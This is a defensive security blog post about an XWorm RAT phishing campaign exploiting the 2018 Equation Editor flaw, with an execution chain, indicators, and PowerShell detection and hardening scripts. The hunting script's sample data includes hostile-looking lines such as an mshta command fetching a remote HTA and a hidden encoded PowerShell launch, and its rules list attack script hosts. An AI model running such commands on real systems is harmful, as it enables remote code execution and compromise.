XWorm RAT Campaign: How a 2018 Excel Vulnerability Is Still Compromising Businesses in 2026

A 2018 Excel Vulnerability Is Still Being Used to Hack Businesses in 2026

Let that sink in.

A vulnerability Microsoft patched in January 2018 is actively being used in a new phishing campaign to deploy the XWorm Remote Access Trojan (RAT). And it’s working.

If you think “old vulnerabilities” aren’t your problem anymore, this campaign proves otherwise.


What Is XWorm?

XWorm is a multi-functional .NET-based Remote Access Trojan first seen in 2022. It’s widely traded in cybercrime marketplaces because it’s:

  • Modular

  • Easy to deploy

  • Highly customizable

  • Packed with plugins

Once installed, attackers gain:

  • Full remote control of the system

  • Keylogging

  • Browser credential theft

  • Clipboard monitoring

  • File access and exfiltration

  • DDoS capabilities

  • Remote shell execution

In short: complete compromise.


How This New Attack Works

This campaign begins with phishing emails disguised as:

  • Payment confirmations

  • Purchase orders

  • Signed banking documents

  • Shipping paperwork

The attachment? A malicious Excel add-in file (.XLAM).

When opened, the file exploits CVE-2018-0802, a stack buffer overflow in EQNEDT32.EXE, the legacy Microsoft Equation Editor that Office used to render embedded equation objects.

Yes. Equation Editor. Microsoft patched the flaw in January 2018 and then removed the component from Office entirely, so a fully updated Office install does not even have it.

Here’s the execution chain in simplified form:

  1. Excel loads an embedded OLE object that references the Equation Editor; Windows starts EQNEDT32.EXE as a separate COM server process to handle it (its parent is svchost.exe, not Excel, which matters for detection)

  2. Malformed equation data overflows a stack buffer and the attacker’s shellcode runs inside EQNEDT32.EXE

  3. Shellcode downloads a malicious HTA file

  4. mshta.exe executes the obfuscated script it contains

  5. The script launches PowerShell, which decodes the next stage in memory

  6. PowerShell injects the XWorm payload into MSBuild.exe, Microsoft’s signed build engine that ships with the .NET Framework

  7. XWorm establishes AES-encrypted command-and-control communication

Apart from the .XLAM attachment itself, nothing in this chain is written to disk: the HTA is fetched over the network, and the PowerShell stage decodes and injects the final payload in memory.

It runs fileless.

That makes file-scanning antivirus significantly less effective; every process involved is a signed Microsoft binary, so what gives the attack away is the behavior, not the files.


Why This Matters for Small Businesses

This campaign highlights three uncomfortable truths:

1. Old vulnerabilities never really die

CVE-2018-0802 is still on CISA’s Known Exploited Vulnerabilities list.

If systems are not fully patched, attackers will absolutely use it.

2. Fileless malware is the new normal

Threat actors abuse legitimate tools like:

  • mshta.exe

  • PowerShell

  • MSBuild.exe

These are signed Microsoft binaries that ship with Windows or the .NET Framework, so allow-listing by publisher or hash alone does not stop them.

If you’re not monitoring behavior, you won’t see it.

3. Phishing remains the #1 entry point

All it takes is one employee opening one Excel file.

That’s it.


Indicators of Compromise to Watch For

Security teams should monitor for:

  • An Office application, or EQNEDT32.EXE, spawning mshta.exe (Equation Editor runs as its own COM server process, so watch its children directly rather than only Excel’s)

  • Excel, or anything descended from it, launching PowerShell, especially with an encoded command line

  • MSBuild.exe starting with a parent other than a build tool such as devenv.exe or dotnet.exe, particularly on machines that build no software

  • Unexpected outbound connections from MSBuild.exe or other processes that have no business reaching the internet (XWorm’s C2 traffic is AES-encrypted, so a network sensor cannot recognise it by content; judge by which process is talking and to where)

  • Unusual process chains

Behavioral detection matters more than signature-based scanning.
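
The process-chain hunt that the execution chain and the indicators above call for, as an added example (this is not code from the original article or from any XWorm research). It reconstructs ancestry from Sysmon Event ID 1 fields keyed on ProcessGuid, and goes one step beyond the article by modelling the Equation Editor nuance: EQNEDT32.EXE is launched by the DCOM launcher, so mshta.exe appears under svchost.exe → EQNEDT32.EXE rather than under EXCEL.EXE. The sample records, the list of parents from which MSBuild.exe is considered legitimate, and the encoded-command regex are constructed assumptions for the example and should be tuned to your environment.

```powershell
# Added example, not code from the original article: rebuild process ancestry from
# Sysmon Event ID 1 (process creation) records and flag the chains described above.
# $events holds constructed sample records, not real telemetry. In production build
# the same objects from
#   Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }
# reading ProcessGuid, ParentProcessGuid, Image and CommandLine from each event's XML.
# GUIDs are used instead of PIDs because Sysmon's ProcessGuid is never reused.

$events = @(
    [pscustomobject]@{ ProcessGuid = '{P-01}'; ParentProcessGuid = '{P-00}'; Image = 'C:\Windows\explorer.exe'; CommandLine = 'explorer.exe' }
    [pscustomobject]@{ ProcessGuid = '{P-02}'; ParentProcessGuid = '{P-01}'; Image = 'C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'; CommandLine = '"EXCEL.EXE" "C:\Users\jdoe\Downloads\PO-48812.xlam"' }
    # Equation Editor is started by the DCOM launcher, so its parent is svchost.exe, not EXCEL.EXE
    [pscustomobject]@{ ProcessGuid = '{P-03}'; ParentProcessGuid = '{P-00}'; Image = 'C:\Windows\System32\svchost.exe'; CommandLine = 'svchost.exe -k DcomLaunch' }
    [pscustomobject]@{ ProcessGuid = '{P-04}'; ParentProcessGuid = '{P-03}'; Image = 'C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE'; CommandLine = '"EQNEDT32.EXE" -Embedding' }
    # 203.0.113.0/24 is a documentation address range; the URL and the base64 blob are constructed
    [pscustomobject]@{ ProcessGuid = '{P-05}'; ParentProcessGuid = '{P-04}'; Image = 'C:\Windows\System32\mshta.exe'; CommandLine = 'mshta.exe http://203.0.113.10/a.hta' }
    [pscustomobject]@{ ProcessGuid = '{P-06}'; ParentProcessGuid = '{P-05}'; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
    [pscustomobject]@{ ProcessGuid = '{P-07}'; ParentProcessGuid = '{P-06}'; Image = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'; CommandLine = 'MSBuild.exe' }
    # Benign control: a developer build from Visual Studio, which must not be flagged
    [pscustomobject]@{ ProcessGuid = '{P-08}'; ParentProcessGuid = '{P-01}'; Image = 'C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe'; CommandLine = 'devenv.exe' }
    [pscustomobject]@{ ProcessGuid = '{P-09}'; ParentProcessGuid = '{P-08}'; Image = 'C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe'; CommandLine = 'MSBuild.exe App.csproj' }
)

$officeApps  = @('EXCEL.EXE', 'WINWORD.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE', 'EQNEDT32.EXE')
$scriptHosts = @('mshta.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe', 'rundll32.exe', 'regsvr32.exe', 'MSBuild.exe')
# Parents from which MSBuild.exe is legitimately launched: an assumption for this example, tune it to your estate
$buildParents = @('devenv.exe', 'dotnet.exe', 'MSBuild.exe', 'cmd.exe')

$byGuid = @{}
foreach ($e in $events) { $byGuid[$e.ProcessGuid] = $e }

function Get-ProcessChain {
    # Follow ParentProcessGuid links up to the root; returns image file names, oldest first.
    param([pscustomobject]$Event)
    $chain = @()
    $cur = $Event
    while ($null -ne $cur) {
        $chain = @([IO.Path]::GetFileName($cur.Image)) + $chain
        $cur = $byGuid[$cur.ParentProcessGuid]
    }
    return ,$chain
}

$findings = foreach ($e in $events) {
    $chain     = Get-ProcessChain $e
    $image     = $chain[-1]
    $ancestors = if ($chain.Count -gt 1) { @($chain[0..($chain.Count - 2)]) } else { @() }
    $parent    = if ($ancestors.Count -gt 0) { $ancestors[-1] } else { '' }
    $hits      = @()

    # Rule 1: a script host (or MSBuild) anywhere below an Office app or Equation Editor
    if ($scriptHosts -contains $image -and @($ancestors | Where-Object { $officeApps -contains $_ }).Count -gt 0) {
        $hits += 'script host descended from Office / Equation Editor'
    }
    # Rule 2: MSBuild.exe whose parent is not a build tool
    if ($image -ieq 'MSBuild.exe' -and $buildParents -notcontains $parent) {
        $hits += 'MSBuild.exe launched from an unexpected parent'
    }
    # Rule 3: PowerShell handed a long base64 blob after -e/-enc/-EncodedCommand (heuristic)
    if (@('powershell.exe', 'pwsh.exe') -contains $image -and $e.CommandLine -match '(?i)\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}') {
        $hits += 'encoded PowerShell command line'
    }
    foreach ($h in $hits) {
        [pscustomobject]@{ Rule = $h; Chain = ($chain -join ' -> '); CommandLine = $e.CommandLine }
    }
}

$findings | Format-Table Rule, Chain, CommandLine -AutoSize -Wrap
```

On the sample data this reports mshta.exe and powershell.exe under svchost.exe -> EQNEDT32.EXE, the encoded PowerShell command line, and MSBuild.exe with powershell.exe as its parent, while the Visual Studio build (devenv.exe -> MSBuild.exe) stays quiet. A rule that only looked for EXCEL.EXE as the direct parent would have missed the first hop entirely.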


How to Protect Your Business

Here’s the non-negotiable baseline:

  • Apply the January 2018 and later Office updates; Microsoft removed Equation Editor altogether, so confirm EQNEDT32.EXE no longer exists under Common Files\Microsoft Shared\EQUATION, and kill-bit its COM class on any install where it lingers

  • Restrict OLE object activation, and keep macros restricted too, but note that this chain needs no macro, so macro policy on its own does not stop it

  • Restrict HTA file execution (block mshta.exe with AppLocker or WDAC on machines that do not need it)

  • Enable PowerShell script block and module logging

  • Deploy behavior-based endpoint detection

  • Monitor outbound encrypted traffic anomalies
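
The baseline above, as an added example script rather than anything from the original article: it checks whether the Equation Editor binary is still present, sets Microsoft’s published COM kill-bit for the Equation Editor class, enables the Attack Surface Reduction rules that cover the Office-to-script-host and downloaded-script stages, and turns on PowerShell script block and module logging. The registry paths, rule GUIDs and cmdlets are Microsoft’s documented ones; which rules to apply, and the -Audit switch for a dry run, are choices made for this example.

```powershell
#Requires -RunAsAdministrator
# Added example (not from the original article): audit and apply the baseline above on a
# Windows endpoint running Microsoft Defender Antivirus. Run with -Audit first: ASR rules
# then log instead of block, so legitimate Office add-ins that spawn child processes can
# be found before enforcement.
param([switch]$Audit)

# 1. Equation Editor: a fully updated Office no longer ships EQNEDT32.EXE (Microsoft removed
#    it in January 2018). If the binary is still present, the fix for CVE-2018-0802 is not
#    installed and the exploit path is reachable.
$eqnedt = @(
    "$env:CommonProgramFiles\Microsoft Shared\EQUATION\EQNEDT32.EXE"
    "${env:CommonProgramFiles(x86)}\Microsoft Shared\EQUATION\EQNEDT32.EXE"
) | Where-Object { Test-Path $_ }
if ($eqnedt) {
    Write-Warning "Equation Editor still installed: $($eqnedt -join ', ') - apply the Office updates"
} else {
    Write-Host 'Equation Editor binary not present'
}

# 2. Kill-bit the Equation Editor COM class so Office cannot instantiate it even if the
#    binary lingers. This is Microsoft's published workaround for the Equation Editor CVEs;
#    the Wow6432Node path covers 32-bit Office on 64-bit Windows.
$eqnClsid = '{0002CE02-0000-0000-C000-000000000046}'
foreach ($root in 'HKLM:\SOFTWARE\Microsoft\Office\Common\COM Compatibility',
                  'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility') {
    $key = Join-Path $root $eqnClsid
    New-Item -Path $key -Force | Out-Null
    New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord -Value 0x400 -Force | Out-Null
}

# 3. Attack Surface Reduction rules for the Office -> script host hop, the downloaded HTA
#    script and the obfuscated stages. (The Equation Editor path itself is handled by
#    steps 1 and 2, since EQNEDT32.EXE is a separate COM server, not an Office app.)
#    Restricting mshta.exe outright is best done with an AppLocker or WDAC deny rule,
#    which is policy-specific and not scripted here.
$asrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC' = 'Block execution of potentially obfuscated scripts'
}
$action = if ($Audit) { 'AuditMode' } else { 'Enabled' }
foreach ($id in $asrRules.Keys) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $id -AttackSurfaceReductionRules_Actions $action
    Write-Host "ASR $action : $($asrRules[$id])"
}

# 4. PowerShell script block and module logging, so the decoded stage is recorded as
#    Event ID 4104 in Microsoft-Windows-PowerShell/Operational even when the launcher
#    passes it with -EncodedCommand.
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
New-Item -Path "$psPolicy\ScriptBlockLogging" -Force | Out-Null
New-ItemProperty -Path "$psPolicy\ScriptBlockLogging" -Name EnableScriptBlockLogging -PropertyType DWord -Value 1 -Force | Out-Null
New-Item -Path "$psPolicy\ModuleLogging\ModuleNames" -Force | Out-Null
New-ItemProperty -Path "$psPolicy\ModuleLogging" -Name EnableModuleLogging -PropertyType DWord -Value 1 -Force | Out-Null
New-ItemProperty -Path "$psPolicy\ModuleLogging\ModuleNames" -Name '*' -PropertyType String -Value '*' -Force | Out-Null

# 5. Show the resulting ASR state for verification (action codes: 0 disabled, 1 block, 2 audit, 6 warn).
$pref = Get-MpPreference
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    '{0}  {1}' -f $pref.AttackSurfaceReductionRules_Ids[$i], $pref.AttackSurfaceReductionRules_Actions[$i]
}
```

Run it once with -Audit, review the Defender ASR audit events for a week, then run it again without the switch. The child-process rule is the one most likely to surface legitimate exceptions (add-ins that launch helper executables), which is why enforcement should wait for the audit pass.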

Security in 2026 is not about installing antivirus and hoping.

It’s about layered defense.


Final Thought

Attackers are not relying on brand-new zero-days.

They’re using old, known, preventable vulnerabilities combined with smart evasion techniques.

If your systems aren’t patched…
If your endpoint protection isn’t behavior-based…
If your users aren’t trained…

You’re not unlucky when you get breached.

You’re predictable.

And predictable businesses are profitable targets.
